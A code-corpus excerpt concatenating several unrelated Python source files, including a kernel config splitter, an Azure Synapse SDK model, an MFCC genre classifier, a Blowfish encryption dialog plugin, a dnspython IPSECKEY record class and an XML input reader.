# Parse config files
for config in sys.argv[1:]:
allconfigs[config] = set()
for line in open(config):
m = re.match("#*\s*CONFIG_(\w+)[\s=](.*)$", line)
if not m:
continue
option, value = m.groups()
allconfigs[config].add((option, value))
# Split out common config options
common = allconfigs.values()[0].copy()
for config in allconfigs.keys():
common &= allconfigs[config]
for config in allconfigs.keys():
allconfigs[config] -= common
allconfigs["common"] = common
# Generate new splitconfigs
for config in allconfigs.keys():
f = open("split-" + config, "w")
for option, value in sorted(list(allconfigs[config])):
if value == "is not set":
print >>f, "# CONFIG_%s %s" % (option, value)
else:
print >>f, "CONFIG_%s=%s" % (option, value)
f.close()
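# Example invocation (hypothetical config file names):
#
#   ./kconfig-split.py config-x86_64 config-arm64
#
# writes split-common with the options shared by both inputs, plus split-config-x86_64
# and split-config-arm64 containing only the options that differ from the common set.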
| 2.40625 | 2 |
src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_statement_output.py | Mannan2812/azure-cli-extensions | 2 | 5090 | <gh_stars>1-10
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyStatementOutput(Model):
"""LivyStatementOutput.
:param status:
:type status: str
:param execution_count:
:type execution_count: int
:param data:
:type data: object
:param ename:
:type ename: str
:param evalue:
:type evalue: str
:param traceback:
:type traceback: list[str]
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'execution_count': {'key': 'execution_count', 'type': 'int'},
'data': {'key': 'data', 'type': 'object'},
'ename': {'key': 'ename', 'type': 'str'},
'evalue': {'key': 'evalue', 'type': 'str'},
'traceback': {'key': 'traceback', 'type': '[str]'},
}
def __init__(self, **kwargs):
super(LivyStatementOutput, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.execution_count = kwargs.get('execution_count', None)
self.data = kwargs.get('data', None)
self.ename = kwargs.get('ename', None)
self.evalue = kwargs.get('evalue', None)
self.traceback = kwargs.get('traceback', None)
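# Illustrative construction (hypothetical values, not from the SDK documentation): the
# model is keyword-argument based, so a successful statement result could look like
#
# output = LivyStatementOutput(status='ok', execution_count=1,
#                              data={'text/plain': '42'})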
| 2.03125 | 2 |
src/main.py | mafshar/sub-puppo | 1 | 5091 | <reponame>mafshar/sub-puppo<filename>src/main.py
#!/usr/bin/env python
'''
Notes:
- Weak implies weakly supervised learning (4 classes)
- Strong implies strongly (fully) superversied learning (10 classes)
- frame number is set to 22ms (default); that is the "sweet spot" based on dsp literature
- sampling rate is 16kHz (for the MFCC of each track)
- Accuracy increases as the test set gets smaller, which implies that a lot of these machine learning models are heavily data-driven (i.e. feed more data for more performance boosts)
- Currently, optimal benchmark results are achieved with a test set size of 10 percent of the total data
'''
import os
import glob
import sys
import time
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from processing import mfcc_processing, datasets
from deep_models import models
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import normalize
input_path = './data/genres/'
mfcc_path = './data/processed/mfcc/'
have_mfccs = True
def normalize_and_split(data, test_size, verbose=False):
scaler = MinMaxScaler()
features = scaler.fit_transform(data['features'])
labels = data['labels']
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=test_size, random_state=42)
norm_data = {}
norm_data['X_train'] = X_train
norm_data['X_test'] = X_test
norm_data['y_train'] = y_train
norm_data['y_test'] = y_test
if verbose:
print 'Training sample feature size:', X_train.shape
print 'Training sample label size:', y_train.shape
print 'Test sample feature size:', X_test.shape
print 'Test sample label size:', y_test.shape
return norm_data
def svm_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
svm_clf = SVC(C=10000, kernel='poly', degree=3, tol=0.0001, max_iter=5000, decision_function_shape='ovr') if weak \
else SVC(C=10000, kernel='poly', degree=6, tol=0.01, max_iter=5000, decision_function_shape='ovr')
svm_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', svm_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for SVM classifier to run is', toc-tic
return
def knn_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
knn_clf = KNeighborsClassifier(n_neighbors=3, weights='distance', p=1, n_jobs=-1) if weak \
else KNeighborsClassifier(n_neighbors=8, weights='distance', p=1, n_jobs=-1)
knn_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', knn_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for KNN classifier to run is', toc-tic
return
def mfcc_nn_model(num_epochs, test_size, weak=False, verbose=False):
tic = time.time()
tensorize = datasets.ToTensor()
dataset = None
net = None
if weak:
dataset = datasets.MfccDatasetWeak(mfcc_path, tensorize)
net = models.MfccNetWeak()
else:
dataset = datasets.MfccDataset(mfcc_path, tensorize)
net = models.MfccNet()
trainloader, testloader = datasets.train_test_dataset_split(dataset)
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.1, momentum=0.8)
for epoch in range(num_epochs):
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
inputs, labels = data
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
            loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
            if verbose and i % 5 == 0:     # print every 5 mini-batches
print('[%d, %5d] loss: %.3f' % (epoch + 1, i + 1, running_loss / 2000))
running_loss = 0.0
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
inputs, labels = data
outputs = net(inputs)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print 'TEST ACCURACY:', 1. * correct / total
toc = time.time()
if verbose:
print '\ttime taken for Mfcc NN to run is', toc-tic
return
if __name__ == '__main__':
mfccs = None
data = None
if not have_mfccs:
have_mfccs = True
print 'calculating mfccs...'
mfccs = mfcc_processing.write_mfccs(input_path, mfcc_path, True)
else :
print 'retrieving mfccs...'
mfccs = mfcc_processing.read_mfccs(mfcc_path, True)
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
weak = False
if weak:
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=True, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=True, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=True, verbose=True)
else:
data = mfcc_processing.featurize_data(mfccs, weak=False, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=False, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=False, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=False, verbose=True)
| 2.109375 | 2 |
plugins/Operations/Crypto/blowfish_encrypt_dialog.py | nmantani/FileInsight-plugins | 120 | 5092 | <filename>plugins/Operations/Crypto/blowfish_encrypt_dialog.py
#
# Blowfish encrypt - Encrypt selected region with Blowfish
#
# Copyright (c) 2019, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import binascii
import re
import sys
import time
import tkinter
import tkinter.ttk
import tkinter.messagebox
try:
import Cryptodome.Cipher.Blowfish
import Cryptodome.Util.Padding
except ImportError:
exit(-1) # PyCryptodome is not installed
# Encrypt the selected region with Blowfish and write the result to stdout
def encrypt(data, root, cm, ckt, ek, cit, ei):
blowfish_mode = {"ECB":Cryptodome.Cipher.Blowfish.MODE_ECB,
"CBC":Cryptodome.Cipher.Blowfish.MODE_CBC,
"CFB":Cryptodome.Cipher.Blowfish.MODE_CFB,
"OFB":Cryptodome.Cipher.Blowfish.MODE_OFB,
"CTR":Cryptodome.Cipher.Blowfish.MODE_CTR}
mode = cm.get()
key_type = ckt.get()
key = ek.get()
iv_type = cit.get()
iv = ei.get()
if key_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", key):
key = binascii.a2b_hex(key)
else:
tkinter.messagebox.showerror("Error:", message="Key is not in hex format.")
return
else:
key = key.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and iv_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", iv):
iv = binascii.a2b_hex(iv)
else:
tkinter.messagebox.showerror("Error:", message="IV is not in hex format.")
return
else:
iv = iv.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and len(iv) != Cryptodome.Cipher.Blowfish.block_size:
tkinter.messagebox.showerror("Error:", message="IV size must be %d bytes." % Cryptodome.Cipher.Blowfish.block_size)
return
key_length = len(key)
if key_length < 4 or key_length > 56:
        tkinter.messagebox.showerror("Error:", message="Key size must be between 4 bytes and 56 bytes.")
return
try:
if mode == "CFB":
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv, segment_size=Cryptodome.Cipher.Blowfish.block_size * 8)
elif mode in ["CBC", "OFB"]:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv)
elif mode == "CTR": # The first seven bytes of IV are used as nonce and the last byte is used as initial_value (compatible with CyberChef).
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], nonce=iv[0:7], initial_value=iv[7])
else:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode])
if mode in ["ECB", "CBC"]:
data = Cryptodome.Util.Padding.pad(data, Cryptodome.Cipher.Blowfish.block_size)
d = cipher.encrypt(data)
except Exception as e:
tkinter.messagebox.showerror("Error:", message=e)
root.quit()
        exit(1) # Not encrypted
sys.stdout.buffer.write(d)
root.quit()
    exit(0) # Encrypted successfully
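# Illustrative sketch (assumed 8-byte IV and 16-byte key, not part of the dialog): how the
# CTR branch above splits the IV, mirroring CyberChef's convention of a 7-byte nonce
# followed by a 1-byte initial counter value.
#
# iv = bytes(range(8))
# cipher = Cryptodome.Cipher.Blowfish.new(b'0123456789abcdef',
#                                         Cryptodome.Cipher.Blowfish.MODE_CTR,
#                                         nonce=iv[0:7], initial_value=iv[7])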
def combo_mode_selected(root, cm, cit, ei, lc):
mode = cm.get()
if mode == "ECB":
cit.configure(state = "disabled")
ei.configure(state = "disabled")
else:
cit.configure(state = "readonly")
ei.configure(state = "normal")
if mode == "CTR":
lc.grid()
else:
lc.grid_remove()
# Receive data
data = sys.stdin.buffer.read()
# Create input dialog
root = tkinter.Tk()
root.title("Blowfish encrypt")
root.protocol("WM_DELETE_WINDOW", (lambda r=root: r.quit()))
label_mode = tkinter.Label(root, text="Mode:")
label_mode.grid(row=0, column=0, padx=5, pady=5, sticky="w")
combo_mode = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_mode["values"] = ("ECB", "CBC", "CFB", "OFB", "CTR")
combo_mode.current(0)
combo_mode.grid(row=0, column=1, padx=5, pady=5, sticky="w")
label_key_type = tkinter.Label(root, text="Key type:")
label_key_type.grid(row=1, column=0, padx=5, pady=5, sticky="w")
combo_key_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_key_type["values"] = ("Text", "Hex")
combo_key_type.current(0)
combo_key_type.grid(row=1, column=1, padx=5, pady=5)
label_key = tkinter.Label(root, text="Key:")
label_key.grid(row=1, column=2, padx=5, pady=5, sticky="w")
entry_key = tkinter.Entry(width=32)
entry_key.grid(row=1, column=3, padx=5, pady=5, sticky="w")
entry_key.focus() # Focus to this widget
label_iv_type = tkinter.Label(root, text="IV type:")
label_iv_type.grid(row=2, column=0, padx=5, pady=5, sticky="w")
combo_iv_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_iv_type["values"] = ("Text", "Hex")
combo_iv_type.current(0)
combo_iv_type.grid(row=2, column=1, padx=5, pady=5)
label_iv = tkinter.Label(root, text="IV:")
label_iv.grid(row=2, column=2, padx=5, pady=5, sticky="w")
entry_iv = tkinter.Entry(width=32)
entry_iv.grid(row=2, column=3, padx=5, pady=5, sticky="w")
button = tkinter.Button(root, text="OK", command=(lambda data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei)))
button.grid(row=3, column=0, padx=5, pady=5, columnspan=4)
label_ctr = tkinter.Label(root, text="Note:\nThe first seven bytes of IV are used as the nonce and the last one\nbyte is used as the initial value of the counter (compatible with\nCyberChef).", justify="left")
label_ctr.grid(row=4, column=0, padx=5, pady=5, columnspan=4, sticky="w")
label_ctr.grid_remove()
# Set callback functions
combo_mode.bind('<<ComboboxSelected>>', lambda event, root=root, cm=combo_mode, cit=combo_iv_type, ei=entry_iv, lc=label_ctr: combo_mode_selected(root, cm, cit, ei, lc))
combo_mode.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_key_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_key.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_iv_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_iv.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
button.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
# These are disabled in the initial state (ECB mode)
combo_iv_type.configure(state = "disabled")
entry_iv.configure(state = "disabled")
# Adjust window position
sw = root.winfo_screenwidth()
sh = root.winfo_screenheight()
root.update_idletasks() # Necessary to get width and height of the window
ww = root.winfo_width()
wh = root.winfo_height()
root.geometry('+%d+%d' % ((sw/2) - (ww/2), (sh/2) - (wh/2)))
root.mainloop()
exit(1) # Not encrypted
| 1.632813 | 2 |
dns/rdtypes/IN/IPSECKEY.py | preo/dnspython | 0 | 5093 | <filename>dns/rdtypes/IN/IPSECKEY.py
# Copyright (C) 2006, 2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import cStringIO
import struct
import dns.exception
import dns.inet
import dns.name
class IPSECKEY(dns.rdata.Rdata):
"""IPSECKEY record
@ivar precedence: the precedence for this key data
@type precedence: int
@ivar gateway_type: the gateway type
@type gateway_type: int
@ivar algorithm: the algorithm to use
@type algorithm: int
@ivar gateway: the public key
@type gateway: None, IPv4 address, IPV6 address, or domain name
@ivar key: the public key
@type key: string
@see: RFC 4025"""
__slots__ = ['precedence', 'gateway_type', 'algorithm', 'gateway', 'key']
def __init__(self, rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key):
super(IPSECKEY, self).__init__(rdclass, rdtype)
if gateway_type == 0:
if gateway != '.' and not gateway is None:
raise SyntaxError('invalid gateway for gateway type 0')
gateway = None
elif gateway_type == 1:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET, gateway)
elif gateway_type == 2:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET6, gateway)
elif gateway_type == 3:
pass
else:
raise SyntaxError('invalid IPSECKEY gateway type: %d' % gateway_type)
self.precedence = precedence
self.gateway_type = gateway_type
self.algorithm = algorithm
self.gateway = gateway
self.key = key
def to_text(self, origin=None, relativize=True, **kw):
if self.gateway_type == 0:
gateway = '.'
elif self.gateway_type == 1:
gateway = self.gateway
elif self.gateway_type == 2:
gateway = self.gateway
elif self.gateway_type == 3:
gateway = str(self.gateway.choose_relativity(origin, relativize))
else:
raise ValueError('invalid gateway type')
return '%d %d %d %s %s' % (self.precedence, self.gateway_type,
self.algorithm, gateway,
dns.rdata._base64ify(self.key))
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
precedence = tok.get_uint8()
gateway_type = tok.get_uint8()
algorithm = tok.get_uint8()
if gateway_type == 3:
gateway = tok.get_name().choose_relativity(origin, relativize)
else:
gateway = tok.get_string()
chunks = []
while 1:
t = tok.get().unescape()
if t.is_eol_or_eof():
break
if not t.is_identifier():
raise dns.exception.SyntaxError
chunks.append(t.value)
b64 = ''.join(chunks)
key = b64.decode('base64_codec')
return cls(rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
header = struct.pack("!BBB", self.precedence, self.gateway_type,
self.algorithm)
file.write(header)
if self.gateway_type == 0:
pass
elif self.gateway_type == 1:
file.write(dns.inet.inet_pton(dns.inet.AF_INET, self.gateway))
elif self.gateway_type == 2:
file.write(dns.inet.inet_pton(dns.inet.AF_INET6, self.gateway))
elif self.gateway_type == 3:
self.gateway.to_wire(file, None, origin)
else:
raise ValueError('invalid gateway type')
file.write(self.key)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
if rdlen < 3:
raise dns.exception.FormError
header = struct.unpack('!BBB', wire[current : current + 3])
gateway_type = header[1]
current += 3
rdlen -= 3
if gateway_type == 0:
gateway = None
elif gateway_type == 1:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET,
wire[current : current + 4])
current += 4
rdlen -= 4
elif gateway_type == 2:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET6,
wire[current : current + 16])
current += 16
rdlen -= 16
elif gateway_type == 3:
(gateway, cused) = dns.name.from_wire(wire[: current + rdlen],
current)
current += cused
rdlen -= cused
else:
raise dns.exception.FormError('invalid IPSECKEY gateway type')
key = wire[current : current + rdlen].unwrap()
return cls(rdclass, rdtype, header[0], gateway_type, header[2],
gateway, key)
from_wire = classmethod(from_wire)
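# Illustrative parse (hedged: the record text follows RFC 4025's examples) using
# dnspython's generic factory rather than instantiating this class directly:
#
# import dns.rdata, dns.rdataclass, dns.rdatatype
# rd = dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.IPSECKEY,
#                          '10 1 2 192.0.2.38 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ==')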
| 2.140625 | 2 |
multistream_select/__init__.py | Projjol/py-multistream-select | 0 | 5094 | __version__ = '0.1.0'
__all__ = ['MultiStreamSelect', 'hexify']
__author__ = '<NAME> (<EMAIL>)'
__name__ = 'multistream'
from .multistream import MultiStreamSelect
from .utils import hexify
| 1.21875 | 1 |
python/input_reader.py | dagesundholm/DAGE | 3 | 5095 | <gh_stars>1-10
"""---------------------------------------------------------------------------------*
* Copyright (c) 2010-2018 <NAME>, <NAME>, <NAME>, *
* <NAME>, <NAME>, <NAME> *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in all*
* copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
*----------------------------------------------------------------------------------"""
# Input file reader
import os
import sys
import xml.etree.ElementTree as ET
import numpy, ast
from .generate_objects import SettingsGenerator
from collections import OrderedDict
class InputProgrammingError(Exception):
pass
class InputXML(object):
tag_type = 'input'
definition_tag = 'input_definition'
def __init__(self, filename = None, \
definition_filename = None,\
input_object = None,\
parent_object = None,\
definition = None, \
directory = None):
if (input_object is not None):
self.root = input_object
elif filename is not None:
if definition_filename is None:
definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml"
if os.path.exists(filename):
self.tree = ET.parse(filename)
self.root = self.tree.getroot()
else:
print("Path for definition file: '{}' does not exist".format(filename))
else:
self.root = None
self.parent_object = parent_object
if directory is not None:
self.directory = directory
elif filename is not None and os.path.exists(filename):
self.directory = os.path.dirname(filename)
elif self.parent_object is not None:
self.directory = self.parent_object.directory
else:
self.directory = None
if definition is not None:
self.definition = definition
elif definition_filename is not None:
if os.path.exists(definition_filename):
definition = ET.parse(definition_filename)
self.definition = definition.getroot()
else:
sys.exit("Input definition filename does not exist: {}".format(definition_filename))
elif self.parent_object is not None:
definition = self.parent_object.definition.find(self.definition_tag)
if definition is not None:
self.definition = definition
else:
                sys.exit("Definition tag '{}' not found from parent definition tree".format(self.definition_tag))
else:
sys.exit("Definition tag input not given.")
self.retrieve()
def prepare(self):
"""
Prepare the input to have all things required to
call the Fortran interface
"""
self.parse()
self.handle_folders()
self.fill_id_values()
kwargs = OrderedDict()
self.get_interface_argument_values(kwargs)
return kwargs
def form_new_directory_path(self, path_text, original_directory = None):
"""
Creates a new directory path from 'path_text' and 'original_directory' and
validate that it exists. Returns the new path.
"""
if original_directory is not None:
complete_path = os.path.join(original_directory, path_text)
else:
complete_path = path_text
directory_path = os.path.dirname(complete_path)
# check if the path exists
if not os.path.exists(directory_path):
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
return directory_path
def retrieve_path(self, path_text, directory):
"""
Retrieves content of xml file at path 'path_text'
to and store it to 'parameter_name' atribute of 'self'.
"""
if directory is not None:
complete_path = os.path.join(directory, path_text)
else:
complete_path = path_text
# check if the path exists
if os.path.exists(complete_path):
tree = ET.parse(complete_path)
return tree.getroot()
else:
raise Exception("Error: '{}' tag path '{}' does not exist".format(self.tag_type, complete_path))
def retrieve(self):
"""
Retrieves content to the tag from external file(s),
if the tag has attribute or child named 'path' and/or
'extends_path'.
"""
if self.root is not None:
# check if current tag has an attribute or child with
# name 'path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'path')
# try to retrieve the content from path_text
if path_text is not None and path_text != "":
try:
self.root = self.retrieve_path(path_text, self.directory)
self.directory = self.form_new_directory_path(path_text, self.directory)
except Exception as e:
sys.exit(str(e))
# check if current tag has an attribute or child with
# name 'extends_path'
path_text = InputXML.read_tag_or_attribute_value(self.root, 'extends_path')
self.extends_roots = []
self.extends_directories = []
directory = self.directory
while path_text is not None:
# try to retrieve the content from path_text
try:
self.extends_roots.append(self.retrieve_path(path_text, directory))
self.extends_directories.append(self.form_new_directory_path(path_text, directory))
except Exception as e:
sys.exit(str(e))
# prepare for the next loop by getting the next extends path and corresponding directory
directory = self.extends_directories[-1]
path_text = InputXML.read_tag_or_attribute_value(self.extends_roots[-1], 'extends_path')
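    # Illustrative input fragment (tag and file names here are assumptions, not taken
    # from the definition file): 'path' replaces the tag's content with the referenced
    # file, while 'extends_path' chains in further files whose values only fill in what
    # is still missing, e.g.
    #
    #   <settings path="scf_settings.xml"/>
    #   <settings extends_path="default_settings.xml">
    #       <some_parameter>1</some_parameter>
    #   </settings>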
def fill_id_values(self):
"""
Finds the id for each parameter where reference is made with name
and fills it to the correct place
"""
for parameter_name in self.parameter_values:
if parameter_name.endswith("_id"):
                # only look up the id if the tag value is still 0,
                # i.e. the id has not been set explicitly in the input
if self.get_parameter_value(parameter_name) == 0:
tagtype = parameter_name[:parameter_name.rfind('_')]
name_tag_found = tagtype+"_name" in self.parameter_values
if name_tag_found:
name = self.parameter_values[tagtype+"_name"]
if name is not None and name != "":
id_value = self.get_tagid_for_name(tagtype, name)
if id_value != -1:
self.parameter_values[parameter_name] = id_value
for child in self.children:
child.fill_id_values()
def get_tagid_for_name(self, tagtype, name):
if self.parent_object is not None:
for child in self.parent_object.children:
if hasattr(child, 'tag_type') and child.tag_type == tagtype and hasattr(child, 'name') and child.name == name:
return child.id
return -1
def get_parameter_definition(self, parameter_name):
"""
Retrieve the parameter definition for parameter name
'parameter_name'.
"""
for parameter_definition in self.definition.findall('parameter'):
if parameter_definition.attrib['name'] == parameter_name:
return parameter_definition
return None
def get_definition_tag(self, tag_name):
"""
Retrieve the definition tag for a tag with name = tag_name
"""
definition = self.definition.find('{}'.format(tag_name))
return definition
def _parse_children(self, root, directory):
"""
Parse children of root xml-tag 'root' and store them as
children in the 'self'.
Note: this function is a subfunctionality of function 'parse'
and it should not be used independently.
"""
for tag in root:
if tag.tag not in self.parameter_values:
# try to find the correct definition tag by using the "*_input"-format
definition = self.definition.find('{}_input'.format(tag.tag))
# if the input definition was not found, try to find the definition from
# the '<class>'-tags
if definition is None:
definition_found = False
for definition_tag in self.definition.findall('class'):
if definition_tag.attrib['name'] == tag.tag:
definition = definition_tag
definition_found = True
break
if not definition_found:
print("Warning: Found unknown tag with name '{}'. Ignoring.".format(tag.tag))
continue
else:
child = InputXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
else:
if tag.tag == 'settings':
child = SettingsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'structure':
child = StructureXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'basis_set':
child = BasisSetXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'action':
child = ActionXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
elif tag.tag == 'scf_energetics':
child = SCFEnergeticsXML(parent_object = self, definition = definition, input_object = tag, directory = directory)
self.children.append(child)
self.child_definitions.append(tag.tag)
self.add_counters(child)
child.parse()
def parse(self):
"""
Parse paremeters and child xml-tags of the root-xml tags stored
in self.root and self.extends_roots. Stores the found child-xml classes
to 'self.children' and the parameter values to 'self.parameter_values'.
The corresponding definitions are stored to 'self.child_definitions' and
'self.parameter_definitions', respectively.
User must note that this function is recursive as it calls 'parse' for
all found children in '_parse_children' calls.
"""
self.parameter_values = OrderedDict()
self.parameter_definitions = OrderedDict()
self.children = []
self.child_definitions = []
# handle the parameters first
for parameter_definition in self.definition.findall('parameter'):
if SettingsGenerator.is_valid_parameter(parameter_definition):
self.set_parameter_value(parameter_definition, self.read_parameter_value(parameter_definition))
self.parameter_definitions[parameter_definition.attrib['name']] = parameter_definition
if parameter_definition.attrib['name'] == 'name':
self.name = self.parameter_values['name']
else:
print("PARAMETER is not valid", parameter_definition.attrib['name'])
# if the object has extends_root, then parse the children from it
# and store them to 'self'
if hasattr(self, 'extends_roots') and self.extends_roots is not None\
and hasattr(self, 'extends_directories') and self.extends_directories is not None:
for i, extends_root in enumerate(self.extends_roots):
self._parse_children(extends_root, self.extends_directories[i])
# parse the children from the xml-root of this object and store them
# to 'self'
if self.root is not None:
self._parse_children(self.root, self.directory)
# add the tag classes that are not found in the input file, just to
# input the default values.
